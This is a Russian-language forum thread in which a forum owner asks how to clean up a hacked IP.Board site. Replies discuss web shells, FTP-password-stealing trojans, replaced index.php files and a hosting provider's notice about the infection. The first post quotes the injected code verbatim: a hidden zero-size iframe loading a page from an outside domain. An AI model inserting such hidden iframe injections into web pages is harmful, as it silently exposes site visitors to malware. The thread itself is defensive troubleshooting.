Перейти к контенту
  • 0

Троян Backdoor на форуме


ElenaI

Вопрос

Странная ситуация - вылавливают его не все юзеры, меньшинство, но сам факт меня озадачил. Прошлась по файлам - никаких изменений с апреля, а вирусные предупреждения начались в августе. Попросила очень занятого программиста хоть глазком одним посмотреть, что за чертовщина. Он "глянул рендерный текст" и вот чего узрел прямо после хедера:

<!-- / End board header -->

<iframe src="http://icqspl.jino-net.ru/index.php" width="0" height="0"></iframe>

 

Вопрос такой - ГДЕ искать эту строку? в каких файлах? Голову сломала уже :D

Версия форума 2.2.2, лицензионная

Ссылка на комментарий
Поделиться на других сайтах

  • Ответы 60
  • Создана
  • Последний ответ

Лучшие авторы в этом вопросе

Лучшие авторы в этом вопросе

Загружено фотографий

Рекомендуемые сообщения

  • 0
История продолжается... Сменила пароль на ftp. Но сегодня мне снова вписали в основной шаблон форума (общий) ту же дрянь. Удалила. Сменила оба админ. пароля (нас в админку двое вхожих было - я и тот, кто мне все устанавливал). Посмотрим, что будет. Но если не поможет? Где дыра? Есть идеи? Может, обновиться до новой версии форума? Но сама боюсь - форум интегрирован по юзерам с Joomla, не уверена, что ничего не попорчу?
Ссылка на комментарий
Поделиться на других сайтах

  • 0

ElenaI.

Ищите шелл на фтп в папке с форумом.

Через шелл злоумышленник имеет доступ ко-всем файлам вашего форума.

Достаточно прочесть содержимое conf_global.php.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

С запозданием отвечу.

Сейчас развелась куча троянов, которые из популярных фтп менеджеров воруют пароли (фар, тотал коммандер и т.д.)

Проверьте свою машину на наличие таких троянов обязательно, иначе вы можете пароли менять хоть "пицот" раз - не поможет.

Если не найдете вебшелла в папке на хосте - попробуйте сменить фтп пароль с ДРУГОЙ машины.

Если найдете - тоже с ДРУГОЙ смените. Вероятность вируса очень велика, сейчас несколько таких гуляет, именно под "веб-мастеров" написанных чтобы сайты хакать. :D

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Сегодня столкнулась с проблемой, что были заменены все index.php файлы на FTP вплоть до 5го уровня вложенности. В указанном месте общего шаблона никаких посторонних строк. Да и собственно файлы форума сами не пострадали ни один, кроме индексов. Это что за дрянь и как бороться? Чистить машину первым делом от троянов? А цель такой атаки в чем? Ну завалили индексы, ну не открывается сайт-форум. Поменяли обратно - открылось. Пароль стырить - это богато возможностями, не спорю. Но судя по времени изменения файлов все это как-то скриптом сделано - в одну минуту.
Ссылка на комментарий
Поделиться на других сайтах

  • 0
Сегодня столкнулась с проблемой, что были заменены все index.php файлы на FTP вплоть до 5го уровня вложенности. В указанном месте общего шаблона никаких посторонних строк. Да и собственно файлы форума сами не пострадали ни один, кроме индексов. Это что за дрянь и как бороться? Чистить машину первым делом от троянов? А цель такой атаки в чем? Ну завалили индексы, ну не открывается сайт-форум. Поменяли обратно - открылось. Пароль стырить - это богато возможностями, не спорю. Но судя по времени изменения файлов все это как-то скриптом сделано - в одну минуту.

Обычно добавляют ещё в десяток php файлов, так что лучше проверьте и их на всякий случай.

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Обычно добавляют ещё в десяток php файлов, так что лучше проверьте и их на всякий случай.

Внимательнейшим образом посмотрела все директории, другие файлы c нормальными датами и размерами вроде бы. Таких подозрительных и неизвестных файлов нет. А как примерно могут называться эти файлы троянские? кроме как index.php

Самих imdex.php было точно не меньше десятка, было еще целых два index.txt. Все повыкинуто и заменено.

Изменено пользователем aridanew
Ссылка на комментарий
Поделиться на других сайтах

  • 0

В сети интернет появился новый тип вируса - Downloader.JS.Psyme.ct (возможны другия названия), распространяющий себя через веб-сайты. Схема заражения довольно проста: достаточно зайти на зараженный сайт и при стандартных настройках безопасности браузера, вирус автоматически установится на компьютере пользователя. После этого он начинает отслеживать логины и пароли от FTP, высылая их злоумышленникам. Собрав определенное количество паролей, запускается специальная программа, которая подключается по FTP к каждому сайту и встраивает в начало или конец страниц собственный html-код.

 

В случае обнаружения следов вируса необходимо выполнить следующие действия с обязательным соблюдением порядка:

1. Удалить вирусное содержимое со страниц вашего сайта.

2. Проверить локальный компьютер на наличие вирусов.

3. Зайти в панель управления хостинг-аккаунтом и изменить пароль на пользователя FTP.

 

Обращаем внимание, что в интернете можно встретить обсуждение данной проблемы, где в качестве причин заражения указываются различные бесплатные \"движки\" (phpBB и т.д.), либо наличие уязвимостей у хостинг-провайдеров. Со своей стороны можем заверить, что вирус распространяется только способом, описанным в этом письме, и его появление не связано с проблемами безопасности на сервере.

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Елена, а где у Вас хостинг? Случайно, не на ValueHost?

Хостинг на e-planet. Сорри, давно не заглядывала в тему.

Проблему все-таки решила сменой всех возможных паролей, в т.ч. и пароля в админку форума. Вот с тех пор уже больше месяца меня не трогают. Чего и всем искренне желаю, ибо траблов и без этой дряни хватает :D

Ссылка на комментарий
Поделиться на других сайтах

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Ответить на вопрос...

×   Вы вставили отформатированный текст.   Удалить форматирование

  Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...

×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.